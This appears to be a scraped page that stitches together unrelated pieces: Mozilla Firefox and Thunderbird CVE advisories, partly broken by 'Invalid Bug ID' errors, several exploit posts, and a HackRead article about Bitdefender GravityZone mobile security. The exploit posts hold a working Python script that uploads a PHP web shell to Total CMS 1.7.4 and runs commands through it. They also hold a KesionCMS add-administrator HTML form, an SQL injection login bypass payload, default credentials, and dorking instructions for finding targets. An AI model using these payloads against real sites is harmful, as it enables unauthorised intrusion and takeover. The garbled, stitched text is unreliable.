Android applications with unpatched vulnerabilities can be launched from a browser using Intents, exposing users to these vulnerabilities. Firefox will now confirm with users that they want to launch an external application before doing so. <br>*This bug only affects Firefox for Android. Other versions of Firefox are unaffected.*. This vulnerability affects Firefox < 111.

Sorry, I can't find "_1810705?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-25749: Invalid Bug ID

Sometimes, when invalidating JIT code while following an iterator, the newly generated code could be overwritten incorrectly. This could lead to a potentially exploitable crash. This vulnerability affects Firefox < 111, Firefox ESR < 102.9, and Thunderbird < 102.9.

**Mozilla Foundation Security Advisory 2023-11**

Announced

March 14, 2023

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 102.9

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2023-25751: Incorrect code generation during JIT compilation**

Reporter

Lukas Bernhard

Impact

high

**Description**

Sometimes, when invalidating JIT code while following an iterator, the newly generated code could be overwritten incorrectly. This could lead to a potentially exploitable crash.

**References**

*   Bug 1814899

**#CVE-2023-28164: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation**

Reporter

Luan Herrera

Impact

moderate

**Description**

Dragging a URL from a cross-origin iframe that was removed during the drag could have led to user confusion and website spoofing attacks.

**References**

*   Bug 1809122

**#CVE-2023-28162: Invalid downcast in Worklets**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

While implementing AudioWorklets, some code may have casted one type to another, invalid, dynamic type. This could have led to a potentially exploitable crash.

**References**

*   Bug 1811327

**#CVE-2023-25752: Potential out-of-bounds when accessing throttled streams**

Reporter

Ronald Crane

Impact

moderate

**Description**

When accessing throttled streams, the count of available bytes needed to be checked in the calling function to be within bounds. This may have lead future code to be incorrect and vulnerable.

**References**

*   Bug 1811627

**#CVE-2023-28163: Windows Save As dialog resolved environment variables**

Reporter

Shaheen Fazim

Impact

moderate

**Description**

When downloading files through the Save As dialog on Windows with suggested filenames containing environment variable names, Windows would have resolved those in the context of the current user.  
_This bug only affects Thunderbird on Windows. Other versions of Thunderbird are unaffected._

**References**

*   Bug 1817768

**#CVE-2023-28176: Memory safety bugs fixed in Thunderbird 102.9**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Timothy Nikkel, Andrew McCreight, and the Mozilla Fuzzing Team reported memory safety bugs present in Thunderbird 102.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Thunderbird 102.9

CVE-2023-25751: Security Vulnerabilities fixed in Thunderbird 102.9

When following a redirect to a publicly accessible web extension file, the URL may have been translated to the actual local path, leaking potentially sensitive information. This vulnerability affects Firefox < 111.

Sorry, I can't find "_1802385?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-28160: Invalid Bug ID

Total CMS version 1.7.4 suffers from a remote shell upload vulnerability.

    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023# Exploit Author: tmrswrr# Version: 1.7.4# Vendor home page : https://www.totalcms.co/# Tested Url : https://www.totalcms.co/demo/soccer/#PLatform : MACOSX1) Go to this page and click edit page buttonhttps://localhost/demo/soccer/2)After go down and will you see downloads area 3)Add in this area shell.php file?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND4) After open this file and write commandshttps://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=idResult :?PNG ...uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)IEND Exploit: import requestsurl = input("Enter the URL: ")urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"headers = {    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'application/json',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Cache-Control': 'no-cache',    'X-Requested-With': 'XMLHttpRequest',    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',    'Origin': urll,    'Dnt': '1',    'Referer': f'{urll}/demo/soccer/admin/',    'Sec-Fetch-Dest': 'empty',    'Sec-Fetch-Mode': 'cors',    'Sec-Fetch-Site': 'same-origin',    'Te': 'trailers',    'Connection': 'close'}data = '''\-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="slug"\r\n\r\ncmssoccerdepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="type"\r\n\r\ndepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="file"; filename="hey.php"\r\nContent-Type: application/x-php\r\n\r\n?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND\r\n\r\n-----------------------------17104855723143716151436432930--'''while True:    command = input("WRITE YOUR COMMAND ('exit' to quit): ")    if command.lower() == "exit":        break    response = requests.post(url, headers=headers, data=data)    if response.status_code == 200:        shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'        shell_url = url + shell_path        print(shell_url)        shell_response = requests.get(shell_url)        print(shell_response.text)    else:        print('Failed to execute the request.')

Total CMS 1.7.4 Shell Upload

KesionCMS ASP version 9.5 suffers from an add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS ASP v9.5 Reinstall Add Admin Exploit                                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] at Line 09 & 16 change the domain name of target .

[+] The infected folder is /install/  
    This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation  
    The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator.   
  For this, the vulnerability can be exploited through the direct link or using the exploitation written below

[+] Exploit

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.target.127.0.0.1/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

KesionCMS ASP 9.5 Add Administrator

Inlislite version 3.1 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Inlislite V3.1 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://inlislite.perpusnas.go.id/?read=installerphp                                                               |  | # Dork      : Inlislite V3.1 © 2017 - 2018                                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin[+] https://127.0.0.1.online/backend/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Inlislite 3.1 Insecure Settings

Biig Order version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ================================================================================| # Title     : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability        || # Author    : indoushka                                                      || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits)        | | # Vendor    : https://www.vaskar.in/                                         |  | # Dork      : "shop_detail.php?detail="                                      |================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : User & Pass : ' or 0=0 #[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================

Biig Order CMS 2 SQL Injection

Menorah Restaurant version 1.0.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Menorah Restaurant - Restaurant Food Ordering System Reinstall script Vulnerability                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://codecanyon.net/item/menorah-restaurant-restaurant-food-ordering-system/23180351                            |  | # Dork      : "Menorah Restaurant . All Rights Reserved."                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /install/loading_website/ ( Load default db contain the demo user and pass )[+] https://127.0.0.0.1/e-catering.terantrindotama/install/loading_website/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Menorah Restaurant 1.0.0 Insecure Settings

Acelle Email Marketing version 1.0 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : Acelle Email Marketing v3.0.15 unrestricted file uploads Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/acelle-email-marketing-web-application/17796082                                        |  | # Dork      : ". Acelle Email Marketing Application by acellemail.com"                                                           |====================================================================================================================================poc :[+]  Unrestricted file uploads You can upload malicious files in compressed format[+]  Dorking İn Google Or Other Search Enggine .[+]  chose web site and singup .[+]  go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates[+]  Zip your backdoor And upload it.        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

Acelle Email Marketing 3.0.15 Arbitrary File Upload

By Habiba Rashid
According to Bitdefender, GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.
This is a post from HackRead.com Read the original post: Bitdefender Introduces GravityZone Security for Android, iOS, and Chromebook

Bitdefender has launched GravityZone Security for Mobile, a next-generation mobile security solution designed to provide organizations with advanced Mobile Threat Detection (MTD) and robust security measures for Android, iOS, and Chromebook devices.

From communication and banking to entertainment and productivity, smartphones have become integral to our daily lives. However, this increasing reliance on mobile devices has also made them lucrative targets for cybercriminals.

According to the 2023 “Market Guide for Mobile Threat Defense” report by Gartner®, recent cyber attacks have shown the involvement of mobile devices at various stages, emphasizing the critical need for advanced mobile threat detection solutions.

**Bitdefender Introduces GravityZone Security**

Bitdefender’s GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.

This unique combination enables the detection and mitigation of both known and unknown mobile threats. By providing application vetting, device status monitoring, and protection against malicious apps and phishing attacks, GravityZone Security for Mobile significantly enhances the overall security posture of mobile devices.

**Proactively Defending Against Network-Based Threats**

One major vulnerability faced by mobile phones is network-based threats. GravityZone Security for Mobile helps organizations detect and respond to these threats, including reconnaissance attempts and man-in-the-middle attacks. By mapping tactics and techniques used in security evaluations, this solution offers a proactive defence against sophisticated attacks specifically targeted at the mobile channel.

**Comprehensive Device Assessments for Strengthening Mobile Security**

Mobile device vulnerabilities pose significant risks to organizations. GravityZone Security for Mobile conducts comprehensive device assessments, monitoring for missing encryption, jailbreaking, root access, and outdated devices. This proactive approach enables organizations to identify and address vulnerabilities promptly, bolstering their mobile security.

**Seamless Integration and Centralized Management**

Integration with existing security solutions is vital for comprehensive protection. GravityZone Security for Mobile seamlessly integrates with the unified Bitdefender GravityZone console, allowing organizations to manage mobile security alongside other endpoint security solutions. This integration extends security beyond traditional endpoints, simplifying the overall security infrastructure and enabling centralized management.

**Cloud-Based and User-Friendly Approach**

With a cloud-based and user-friendly approach, GravityZone Security for Mobile ensures easy deployment and management for organizations with mobile workforces. Its zero-touch enrollment feature streamlines mass deployments of mobile devices, enhancing security without burdening end-users.

**Meeting Regulatory Compliance Standards**

Regulatory compliance is a top concern for organizations in regulated industries. GravityZone Security for Mobile provides real-time visibility, enabling application vetting, detecting abnormal app behaviour, and enforcing application version control. By facilitating user warnings, isolating risky applications, and taking necessary actions, organizations can meet privacy and security standards more effectively.

**Conclusion:**

As the mobile threat landscape continues to evolve, organizations must enhance their mobile phone security. Bitdefender’s GravityZone Security for Mobile offers a comprehensive solution that effectively tackles mobile threats head-on.

By leveraging advanced technology, proactive defense mechanisms, and seamless integration, organizations can ensure the security and privacy of their mobile devices, safeguarding their operations from evolving cyber threats.

**RELATED ARTICLES**

1.  Ankr Launches Chainscanner Blockchain Explorer Tool
2.  Memcyco Introduces Real-Time Solution to Combat Brandjacking
3.  Mobile Security Firm Cirotta Launches Anti-Hacking Phone Cases
4.  ProtonVPN launches extensions for Chrome and Firefox browsers
5.  Microsoft launches Linux memory forensics tool to detect malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Tag

#firefox